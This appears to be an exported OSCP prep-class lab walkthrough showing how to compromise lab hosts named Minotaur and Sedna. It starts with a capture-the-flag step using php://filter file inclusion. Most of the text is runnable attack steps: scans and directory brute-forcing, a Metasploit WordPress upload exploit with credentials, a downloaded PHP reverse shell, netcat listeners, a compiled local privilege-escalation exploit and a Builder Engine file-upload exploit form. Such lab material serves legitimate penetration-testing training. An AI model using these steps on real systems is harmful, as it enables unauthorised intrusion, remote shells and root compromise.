source:<text:line-break/>R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr<text:line-break/>ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl<text:line-break/>bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi<text:line-break/>YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK<text:line-break/>ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56<text:line-break/>YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg<text:line-break/>TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l<text:line-break/>IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh<text:line-break/>ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl<text:line-break/>IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK<text:line-break/> <text:line-break/>------ https://www.base64decode.org/ -------<text:line-break/>------ Decoded, but didn't find a flag -----<text:line-break/> <text:line-break/> <text:line-break/>http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/<text:line-break/><text:s text:c="2"/>-- view source --<text:line-break/><text:s text:c="2"/>-- Nothing in source --<text:line-break/> <text:line-break/>Browsed to the flag link:<text:line-break/>view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag<text:line-break/><text:s text:c="2"/>-- view source --<text:line-break/><text:s text:c="2"/>-- Nothing in source --<text:line-break/> <text:line-break/> <text:line-break/>Tried a PHP base64 decode with the URL:<text:line-break/>http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php<text:line-break/>http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php<text:line-break/>http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php<text:line-break/> <text:line-break/>------ https://www.base64decode.org/ -------<text:line-break/>Use the string found here:<text:line-break/>http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php<text:line-break/> <text:line-break/>-------------------------------------------------------------------<text:line-break/>PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==<text:line-break/>-------------------------------------------------------------------<text:line-break/>&lt;?php<text:line-break/>defined ('VIAINDEX') or die('Ooooh! So close..');<text:line-break/>?&gt;<text:line-break/>&lt;h1&gt;Flag&lt;/h1&gt;<text:line-break/>&lt;p&gt;Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?&lt;/p&gt;<text:line-break/>&lt;img src="trollface.png" /&gt;<text:line-break/>&lt;?php<text:line-break/>// Ok, ok. Here's your flag!<text:line-break/>//<text:line-break/>// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}<text:line-break/>//<text:line-break/>// Well done, you're doing great so far!<text:line-break/>// Next step. SHELL!<text:line-break/>//<text:line-break/>//<text:line-break/>// Oh. That flag above? You're gonna need it...<text:line-break/>?&gt;<text:line-break/> <text:line-break/>######################<text:line-break/># Attacking Minotaur #<text:line-break/>######################<text:line-break/> <text:line-break/>Step 1: Portscan/Bannergrab the target host<text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>sudo nmap -sV 172.31.2.117<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Step 2: Vulnerability scan the web server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~/toolz/Nikto2/program<text:line-break/> <text:line-break/>perl nikto.pl -h 172.31.2.117<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Step 3: Directory brute-force the webserver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117 wordlists/big.txt<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/>### dirb output ###<text:line-break/>==&gt; DIRECTORY: http://172.31.2.117/bull/<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>Step 4: Run wordpress vulnerability scanner<text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>sudo apt-get install -y libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential libgmp-dev zlib1g-dev<text:line-break/> <text:line-break/>cd ~/toolz<text:line-break/> <text:line-break/>rm -rf wpsca*<text:line-break/> <text:line-break/>git clone https://github.com/wpscanteam/wpscan.git<text:line-break/> <text:line-break/>cd wpscan<text:line-break/> <text:line-break/>sudo gem install bundler &amp;&amp; bundle install --without test development<text:line-break/> <text:line-break/>rbenv install 2.5.0-dev<text:line-break/> <text:line-break/>ruby wpscan.rb -u http://172.31.2.117/bull/ --enumerate u<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Step 5: Attack vulnerable Wordpress plugin with Metasploit<text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>cd ~/toolz/metasploit<text:line-break/> <text:line-break/>./msfconsole<text:line-break/> <text:line-break/>use exploit/unix/webapp/wp_slideshowgallery_upload<text:line-break/> <text:line-break/>set RHOST 172.31.2.117<text:line-break/> <text:line-break/>set RPORT 80<text:line-break/> <text:line-break/>set TARGETURI /bull<text:line-break/> <text:line-break/>set WP_USER bully<text:line-break/> <text:line-break/>set WP_PASSWORD Bighornedbulls<text:line-break/> <text:line-break/>exploit<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/>Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.<text:line-break/>This is a lab limitation that I implemented to stop students from compromising hosts in the lab network<text:line-break/>and then from the lab network attacking other students.<text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz<text:line-break/> <text:line-break/>tar -zxvf php-reverse-shell-1.0.tar.gz<text:line-break/> <text:line-break/>cd ~/toolz/php-reverse-shell-1.0/<text:line-break/> <text:line-break/>nano php-reverse-shell.php<text:line-break/>-----------------------------------------------------------------------<text:line-break/><text:s text:c="4"/>***** change the $ip and $port variables to a host that you have already compromised in the network<text:line-break/><text:s text:c="4"/>***** for this example I chose 172.31.2.64 and kept port 1234<text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>chmod 777 php-reverse-shell.php<text:line-break/>cp php-reverse-shell.php ..<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>----------- Paste this into a new file called wp_gallery_slideshow_146_suv.py -----------<text:line-break/>https://www.exploit-db.com/raw/34681/<text:line-break/> <text:line-break/>python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php<text:line-break/> <text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Set up netcat listener on previously compromised host<text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>ssh -l webmin 172.31.2.64<text:line-break/><text:s text:c="4"/>webmin1980<text:line-break/> <text:line-break/>python -c 'import pty;pty.spawn("/bin/bash")'<text:line-break/> <text:line-break/> <text:line-break/>cd /tmp<text:line-break/> <text:line-break/>./boom2<text:line-break/> <text:line-break/>nc -lvp 1234<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>---------------------Type This in your browser ------------------------<text:line-break/>http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>Now check your listener to see if you got the connection<text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>id<text:line-break/> <text:line-break/>/sbin/ifconfig<text:line-break/> <text:line-break/>python -c 'import pty;pty.spawn("/bin/bash")'<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>cd /tmp<text:line-break/>cat &gt;&gt; exploit2.c &lt;&lt; out<text:line-break/>-----------------------------------------------------------------------<text:line-break/>**************paste in the content from here *****************<text:line-break/>https://www.exploit-db.com/raw/37292/<text:line-break/> <text:line-break/>**************hit enter a few times *****************<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>out<text:line-break/> <text:line-break/> <text:line-break/>gcc -o boom2 exploit2.c<text:line-break/> <text:line-break/>./boom2<text:line-break/> <text:line-break/>id<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/>......YEAH - do the happy dance!!!!<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> ##################<text:line-break/># Attacking Sedna #<text:line-break/>###################<text:line-break/> <text:line-break/>Attack steps:<text:line-break/>-------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Step 1: Ping sweep the target network<text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>nmap -sP 172.31.2.0/24<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Step 2: Port scan/Bannergrab the target host<text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>sudo nmap -sV 172.31.2.86<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>PORT<text:s text:c="5"/>STATE<text:s text:c="4"/>SERVICE<text:s text:c="5"/>VERSION<text:line-break/>22/tcp<text:s text:c="3"/>open<text:s text:c="5"/>ssh<text:s text:c="9"/>(protocol 2.0)<text:line-break/>53/tcp<text:s text:c="3"/>open<text:s text:c="5"/>domain<text:s text:c="6"/>ISC BIND 9.9.5-3-Ubuntu<text:line-break/>80/tcp<text:s text:c="3"/>open<text:s text:c="5"/>http<text:s text:c="8"/>Apache httpd 2.4.7 ((Ubuntu))<text:line-break/>110/tcp<text:s text:c="2"/>open<text:s text:c="5"/>pop3<text:s text:c="8"/>Dovecot pop3d<text:line-break/>111/tcp<text:s text:c="2"/>open<text:s text:c="5"/>rpcbind<text:s text:c="5"/>2-4 (RPC #100000)<text:line-break/>139/tcp<text:s text:c="2"/>open<text:s text:c="5"/>netbios-ssn Samba smbd 3.X (workgroup: SEDNA)<text:line-break/>143/tcp<text:s text:c="2"/>open<text:s text:c="5"/>imap<text:s text:c="8"/>Dovecot imapd<text:line-break/>445/tcp<text:s text:c="2"/>open<text:s text:c="5"/>netbios-ssn Samba smbd 3.X (workgroup: SEDNA)<text:line-break/>514/tcp<text:s text:c="2"/>filtered shell<text:line-break/>993/tcp<text:s text:c="2"/>open<text:s text:c="5"/>ssl/imap<text:s text:c="4"/>Dovecot imapd<text:line-break/>995/tcp<text:s text:c="2"/>open<text:s text:c="5"/>ssl/pop3<text:s text:c="4"/>Dovecot pop3d<text:line-break/>8080/tcp open<text:s text:c="5"/>http<text:s text:c="8"/>Apache Tomcat/Coyote JSP engine 1.1<text:line-break/>1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :<text:line-break/>SF-Port22-TCP:V=6.40%I=7%D=1/26%Time=5A6B4540%P=x86_64-pc-linux-gnu%r(NULL<text:line-break/>SF:,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");<text:line-break/> <text:line-break/>Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .<text:line-break/>Nmap done: 1 IP address (1 host up) scanned in 246.11 seconds<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Step 3: Vulnerability scan the webserver ports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86<text:line-break/> <text:line-break/>perl nikto.pl -h 172.31.2.86:8080<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Step 4: Perform directory bruteforce against the target host<text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl<text:line-break/> <text:line-break/>perl Webr00t.pl -h 172.31.2.86 -v<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/><text:s text:c="18"/>or with dirbuster (dirb)<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> 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86 wordlists/big.txt<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/>### dirb output ###<text:line-break/>==&gt; DIRECTORY: http://172.31.2.86/blocks/<text:line-break/>==&gt; DIRECTORY: http://172.31.2.86/files/<text:line-break/>==&gt; DIRECTORY: http://172.31.2.86/modules/<text:line-break/>==&gt; DIRECTORY: http://172.31.2.86/system/<text:line-break/>==&gt; DIRECTORY: http://172.31.2.86/themes/<text:line-break/> <text:line-break/>+ http://172.31.2.86/robots.txt (CODE:200|SIZE:36)<text:line-break/>+ http://172.31.2.86/server-status (CODE:403|SIZE:291)<text:line-break/>### dirb output ###<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Browsed each of the directories and found that inside of the /themes folder contained the vulnerable application Builder Engine 3.5.0<text:line-break/> <text:line-break/>An exploit for this application can be found at:<text:line-break/>https://www.exploit-db.com/exploits/40390/<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>-------------------save this a "BuilderEngine.html"-------------------<text:line-break/>&lt;html&gt;<text:line-break/>&lt;body&gt;<text:line-break/>&lt;form method="post" action="http://172.31.2.86/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"<text:line-break/> <text:line-break/>enctype="multipart/form-data"&gt;<text:line-break/><text:s text:c="4"/>&lt;input type="file" name="files[]" /&gt;<text:line-break/><text:s text:c="4"/>&lt;input type="submit" value="send" /&gt;<text:line-break/>&lt;/form&gt;<text:line-break/>&lt;/body&gt;<text:line-break/>&lt;/html&gt;<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>Download this webshell (http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz) to your local machine.<text:line-break/> <text:line-break/>Change the IP address in the source code of the webshell to another server in the lab network that you have root access to.<text:line-break/> <text:line-break/>On the other server run:<text:line-break/>nc -lvp 1234<text:line-break/> <text:line-break/>Then upload the pentestmonkey reverseshell to .86<text:line-break/> <text:line-break/>============================================ Attacking another server because I need a reverse shell ===================================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3::30:03</meta:creation-date>
    <dc:creator>Generated</dc:creator>
    <dc:date>2025-06-28T13::30:03</dc:date>
    <dc:language>en-US</dc:language>
    <meta:editing-cycles>1</meta:editing-cycles>
    <meta:editing-duration>PT0S</meta:editing-duration>
    <dc:title>seguridad:enlaces:certificaciones:oscp:oscp_prep_class</dc:title>
  </office:meta>
</office:document-meta>
</file>